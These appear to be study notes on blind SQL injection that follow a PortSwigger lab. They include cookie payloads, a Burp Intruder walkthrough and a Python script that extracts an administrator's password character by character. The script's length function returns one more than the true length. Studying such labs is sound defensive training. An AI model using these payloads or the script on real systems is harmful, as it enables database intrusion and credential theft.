# Blind SQLi with conditional responses
---
Consider an application that uses tracking cookies to gather analytics about usage.
Requests to the application include a cookie header like this:
```js
Cookie: TrackingId=u5YD3PapBcR4lN3e7Tj4
```

When a request containing a `TrackingId` cookie is processed, the application determines whether this is a known user using a SQL query like this:
```sql
SELECT TrackingId FROM TrackedUsers WHERE TrackingId = 'u5YD3PapBcR4lN3e7Tj4'
```

- This query is vulnerable to SQLi, but the results from the query are not returned to the user.
- However, the application does behave differently depending on whether the query returns any data.
- If it returns data (_because a recognized `TrackingId` was submitted_), then a "Welcome back" message is displayed within the page.

This behavior is enough to be able to exploit the blind SQLi vulnerability and retrieve information by triggering different responses conditionally, depending on an injected condition.
To see how this works, suppose that two requests are sent containing the following `TrackingId` cookie values in turn:
```
…xyz' AND '1'='1 
…xyz' AND '1'='2
```
- The _first_ of these _values_ will cause the query to return results, because the injected `AND '1'='1` condition is _true_, and so the "Welcome back" message will be displayed. 
- Whereas the _second value_ will cause the query to not return any results, because the injected condition is _false_, and so the "Welcome back" message will not be displayed.
This allows us to determine the answer to any single injected condition, and so extract data one bit at a time.

**For example**, suppose there is a table called `Users` with the columns `Username` and `Password`, and a user called `Administrator`.
We can systematically determine the password for this user by sending a series of inputs to test the password one character at a time.
To do this, we start with the following input:
```sql
xyz' AND SUBSTRING((SELECT Password FROM Users WHERE Username = 'Administrator'), 1, 1) > 'm
```
This returns the "Welcome back" message, indicating that the injected condition is true, and so the first character of the password is greater than `m`.

Next, we send the following input:
```sql
xyz' AND SUBSTRING((SELECT Password FROM Users WHERE Username = 'Administrator'), 1, 1) > 't
```
This does not return the "Welcome back" message, indicating that the injected condition is false, and so the first character of the password is not greater than `t`.

Eventually, we send the following input, which returns the "Welcome back" message, thereby confirming that the first character of the password is `s`:
```sql
xyz' AND SUBSTRING((SELECT Password FROM Users WHERE Username = 'Administrator'), 1, 1) = 's
```
We can continue this process to systematically determine the full password for the `Administrator` user.

>[!note]
>The `SUBSTRING` function is called `SUBSTR` on some types of database.
>For more details, see the [SQLi cheat sheet](https://portswigger.net/web-security/sql-injection/cheat-sheet)

# Lab: Blind SQL injection with conditional responses
---
1.  Visit the front page of the shop, and use Burp Suite to intercept and modify the request containing the `TrackingId` cookie. For simplicity, let's say the original value of the cookie is `TrackingId=xyz`.
2.  Modify the `TrackingId` cookie, changing it to:
    - `TrackingId=xyz' AND '1'='1`
    - Verify that the "Welcome back" message appears in the response.
3.  Now change it to:
    - `TrackingId=xyz' AND '1'='2`
    - Verify that the "Welcome back" message does not appear in the response. 
    - This demonstrates how you can test a single boolean condition and infer the result.
4.  Now change it to:
    - `TrackingId=xyz' AND (SELECT 'a' FROM users LIMIT 1)='a`
    - Verify that the condition is true, confirming that there is a table called `users`.
5.  Now change it to: 
    - `TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator')='a`
    - Verify that the condition is true, confirming that there is a user called `administrator`.
6.  The next step is to determine how many characters are in the password of the `administrator` user. To do this, change the value to:
    - `TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>1)='a`
    - This condition should be true, confirming that the password is greater than 1 character in length.
7.  Send a series of follow-up values to test different password lengths. Send:
    - `TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>2)='a`
    - Then send:
    - `TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>3)='a`
    - And so on. 
    - You can do this manually using [Burp Repeater](https://portswigger.net/burp/documentation/desktop/tools/repeater), since the length is likely to be short. 
    - When the condition stops being true (_i.e. when the "Welcome back" message disappears_), you have determined the length of the password, which is in fact 20 characters long.
8. After determining the length of the password, the next step is to test the character at each position to determine its value. This involves a much larger number of requests, so you need to use [Burp Intruder](https://portswigger.net/burp/documentation/desktop/tools/intruder). Send the request you are working on to Burp Intruder, using the context menu.
9. In the Positions tab of Burp Intruder, clear the default payload positions by clicking the "Clear §" button.
10. In the Positions tab, change the value of the cookie to:
    - `TrackingId=xyz' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='administrator')='a`
    - This uses the `SUBSTRING()` function to extract a single character from the password, and test it against a specific value. 
    - Our attack will cycle through each position and possible value, testing each one in turn.
11.  Place payload position markers around the final `a` character in the cookie value. To do this, select just the `a`, and click the "Add §" button. You should then see the following as the cookie value (note the payload position markers):
    - `TrackingId=xyz' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='administrator')='§a§`
12.  To test the character at each position, you'll need to send suitable payloads in the payload position that you've defined. You can assume that the password contains only lowercase alphanumeric characters. Go to the Payloads tab, check that "Simple list" is selected, and under **Payload settings** add the payloads in the range a - z and 0 - 9. You can select these easily using the "Add from list" drop-down.
13.  To be able to tell when the correct character was submitted, you'll need to grep each response for the expression "Welcome back". To do this, go to the **Settings** tab, and the "Grep - Match" section. Clear any existing entries in the list, and then add the value "Welcome back".
14.  Launch the attack by clicking the "Start attack" button or selecting "Start attack" from the Intruder menu.
15.  Review the attack results to find the value of the character at the first position. You should see a column in the results called "Welcome back". One of the rows should have a tick in this column. The payload showing for that row is the value of the character at the first position.
16.  Now, you simply need to re-run the attack for each of the other character positions in the password, to determine their value. To do this, go back to the main Burp window, and the Positions tab of Burp Intruder, and change the specified offset from 1 to 2. You should then see the following as the cookie value:
    - `TrackingId=xyz' AND (SELECT SUBSTRING(password,2,1) FROM users WHERE username='administrator')='a`
17.  Launch the modified attack, review the results, and note the character at the second offset.
18.  Continue this process testing offset 3, 4, and so on, until you have the whole password.
19.  In the browser, click "My account" to open the login page. Use the password to log in as the `administrator` user.

```python
#!/usr/bin/env python3
# Blind SQL injection with conditional responses
import requests
import string
import sys

# Debugging
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
p = {'http':'http://127.0.0.1:8080', 'https':'http://127.0.0.1:8080'}

def get_password(url, cookie, session, number):
    admin_passwd = list()
    for iteration in range(1,number+1):
        for character in string.printable:
            payload = f"' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), {iteration}, 1) = '{character}"
            c = {'TrackingId':f'{cookie}{payload}', 'session':f'{session}'}
            req = requests.get(url, cookies=c, verify=False, proxies=p)
            if "Welcome back" in req.text:
                admin_passwd.append(character)
                break
            #print(f"[-] Trying={''.join(admin_passwd) + character}")
            x = ''.join(admin_passwd) + character
            sys.stdout.write('\r' + x)
            sys.stdout.flush()

def get_length(url, cookie, session):
    for i in range(1,100):
        payload = f"' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)={i})='a"
        c = {'TrackingId':f'{cookie}{payload}', 'session':f'{session}'}
        req = requests.get(url, cookies=c, verify=False, proxies=p)
        if "Welcome" in req.text:
            return i+1
        i = i+1
    return False

if __name__ == "__main__":
    try:
        url = sys.argv[1].strip()
        cookie = sys.argv[2].strip()
        session = sys.argv[3].strip()
    except IndexError:
        print("[-] Usage: {} <url> <cookie_value> <session_value>".format(sys.argv[0]))
        print("[-] Example: {} http://example.com abcdef123 abcdef123".format(sys.argv[0]))
        sys.exit(1)

    print("[-] Finding the password length...")
    passwd_length = get_length(url, cookie, session)
    if passwd_length:
        print("[-] Found the password length... [{}]".format(passwd_length))
        print("[-] Retrieving administrator password...")
        get_password(url, cookie, session, passwd_length)
    else:
        print("[-] Can't find the password length!")
```